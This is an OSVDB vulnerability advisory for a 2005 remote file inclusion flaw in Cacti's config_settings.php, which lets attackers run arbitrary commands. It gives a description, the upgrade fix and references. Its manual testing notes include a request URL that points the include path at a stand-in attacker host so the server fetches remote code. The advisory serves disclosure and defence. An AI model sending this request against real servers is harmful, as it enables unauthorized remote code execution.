Cacti config_settings.php config Variable Remote File Inclusion

2005-06-22T00:00:00
ID OSVDB:17425
Type osvdb
Reporter Maciej Piotr Falkiewicz()
Modified 2005-06-22T00:00:00

Description

Vulnerability Description

Cacti contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'config_settings.php' script not properly sanitizing user input supplied to the 'config[include_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 0.8.6e or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Cacti contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to 'config_settings.php' script not properly sanitizing user input supplied to the 'config[include_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/include/config_settings.php?config[include_path]=http://[attacker]/includedfile

References:

Vendor Specific News/Changelog Entry: http://www.cacti.net/release_notes_0_8_6e.php Vendor Specific Advisory URL Security Tracker: 1014252 Secunia Advisory ID:15490 Secunia Advisory ID:16136 Secunia Advisory ID:15931 Related OSVDB ID: 17424 Related OSVDB ID: 17426 Other Advisory URL: http://www.idefense.com/application/poi/display?id=266&type=vulnerabilities Other Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000978 Other Advisory URL: http://www.debian.org/security/2005/dsa-764 Keyword: GLSA-200506-20 ISS X-Force ID: 21119 CVE-2005-1526 Bugtraq ID: 14028